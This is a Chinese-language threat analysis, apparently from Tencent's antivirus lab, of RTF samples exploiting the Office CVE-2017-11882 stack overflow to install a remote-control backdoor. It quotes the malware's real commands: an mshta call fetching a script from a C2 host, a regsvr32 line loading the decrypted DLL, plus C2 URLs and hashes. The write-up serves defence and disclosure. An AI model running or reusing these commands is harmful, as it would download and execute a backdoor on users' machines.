利用CVE-2017-11882漏洞利用的恶意样本分析
来源:互联网 发布:数据库范式例题 编辑:程序博客网 时间:2024/05/16 09:07
概述
2017年11月14日,微软修复了一个Office远程代码执行严重漏洞,漏洞编号为CVE-2017-11882。该漏洞类型为典型的栈溢出漏洞,漏洞代码存在于EQNEDT32.EXE组件中。据称,该组件于2001年编译嵌入Office之后就没有任何修改,迄今已存在17年,这也决定了漏洞会影响当前流行的所有Office版本,漏洞影响之广泛可见一斑。
腾讯安全联合实验室反病毒实验室率先捕获多款利用该漏洞传播木马后门的恶意样本。2017年11月20日,漏洞利用POC公布,腾讯电脑管家紧急评估漏洞影响后并率先在微博进行了安全预警。11月21日,腾讯哈勃分析系统捕获到多起漏洞利用样本,但此时间段的样本大多数都为测试使用,仅有几例的远程代码是从局域网地址中获取,对这几例从局域网地址获取代码执行的样本,尚没有足够的证据表明是用来横向移动的。11月22日,腾讯哈勃分析系统捕获到多个利用漏洞执行恶意功能的样本。
这些样本执行过程大体如下:利用rtf文档进行传播,文档打开后触发CVE-2017-11882漏洞,漏洞成功利用执行mshta.exe,而mshta.exe从CC地址1中获得并执行恶意脚本代码,恶意脚本代码会加载本地的powershell,powershell功能会从CC地址2中加载密文,密文使用AES解密后为dll文件,保存到本地后,使用regsvr32加载执行。最终解密出来的DLL文件为可接收远程指令的后门木马。
分析
样本md5:11f71f387e87bbb2b97b6c27f78320e4
EQNEDT32.EXE用于在Office文档中插入和编辑数学公式。该组件在OLE技术规范下设计开发,首发于Microsoft Office 2000和Microsoft 2003,从Microsoft Office 2007开始,微软在历次的版本更新中为了保持良好的向上兼容性,一直劫持该组件的功能。
栈溢出漏洞就存在于EQNEDT32.EXE中,提取rtf中嵌入的OLE对象中,可以看到CLSID: 0002CE02-0000-0000-C000-000000000046的内容和栈溢出后要执行的代码片段。
漏洞利用成功后执行命令:
mshta https://zstorage.biz/read.txt
通过页面请求到的read.txt如下所示
read.txt的内容被mshta解析执行,其主要功能就是以指定参数运行powershell。可以看到powershell运行时的参数字段如下所示
使用base64解码后,可以看到真正的powershell的指令为:
基对应的功能就是:从地址https://zstorage.biz/f111.txt读取内容,使用AES解密(使用的key为硬编码)后,保存到appdata目录下的随机文件名中,并使用regsvr32加载执行。
从f111.txt读取到加密内容为:
使用AES解密后的PE文件为一个dll,对应的Md5为:25ede508dce10342d52b72aaa2f35d3e。最后,通过下面命令加载dll执行:
regsvr32.exe /s "C:\Users\用户名\AppData\Roaming\WMSGRwVuEL.txt(随机文件名)"
该DLL在执行过程中收集用户信息,包括:用户名,计算机名,操作系统信息,IP地址及安定类软件的安装情况等。检测的安全软件列表如下:
该dll最终会向CC地址https://mail.yahoo.org.kz/v/img.php 发起连接请求,并根据该地址返回的指令执行不同的操作,这些操作包含:下载PE文件执行,向另外请求地址数据,清理痕迹,cmd执行等功能。
总结
上周微软针对该漏洞发出补丁程序,目前仍有很多用户没有及时更新补丁,从而极易受攻击。另外,由于该漏洞原理简单,利用稳定,很大的概率会在后续被大范围利用,腾讯安全联合实验室反病毒实验室将持续跟进漏洞利用情况并及时向公众反馈国内影响状况。最后仍需提醒广大用户提高安全意识,及时使用腾讯电脑管家等安全类软件更新系统补丁,切莫点击来源不明的邮件附件文档等。
- 利用CVE-2017-11882漏洞利用的恶意样本分析
- CVE-2017-11826漏洞利用样本分析
- CVE-2013-3346&CVE-2013-5065-Adobe Reader释放重引用漏洞+NDProxy.sys数组越界漏洞联合利用恶意样本分析
- APT34利用CVE-2017-11882针对中东攻击样本分析
- Office远程代码执行漏洞POC样本分析(CVE-2017-11882)
- CVE-2012-1889漏洞利用
- Windows 8.1内核利用—CVE-2014-4113漏洞分析
- 基于流量的CVE-2014-0160漏洞利用检测方法
- 关于 WinXP SP2 下的 CVE-2014-8636 漏洞利用
- OFFICE OLE2LINK(CVE-2017-0199)漏洞利用详解
- 腾讯反病毒实验室预警:CVE-2017-11882漏洞最新利用方法
- CVE-2014-6271“破壳”漏洞利用过程
- CVE-2017-12617漏洞分析
- CVE-2014-7911 Android本地提权漏洞分析与利用
- CVE-2015-7547漏洞分析从原因到利用到补丁(非常适合小白)
- CVE-2016-10190 FFmpeg Http协议 heap buffer overflow漏洞分析及利用
- 一个携带恶意ELF的样本分析
- 利用Metasploit测试一个古老的IE8漏洞(编号CVE-2012-1875)
- CDQ分治题表(持续更新中)
- 解决按需引入 ECharts 后图例不显示的问题
- 手动调参慢,随机搜索浪费资源?Deepmind异步优化算法PBT解决神经网络痛点
- Latex写算法的伪代码排版
- 单例模式Java的七种写法
- 利用CVE-2017-11882漏洞利用的恶意样本分析
- 如何找到最优学习率?
- 无法创建新的堆栈防护页面的解决办法
- 用代码说明height, clientHeight, offsetHeight, scrollHeight 区别 及 为什么height值有时取不到
- pci总线扫描设备本地操作(二)(local bus operation)
- 形态学操作
- json 得到 第一个 对象的 属性
- Apache系列—Windows不能在本地计算机启动Apache
- 一篇对JS的重新介绍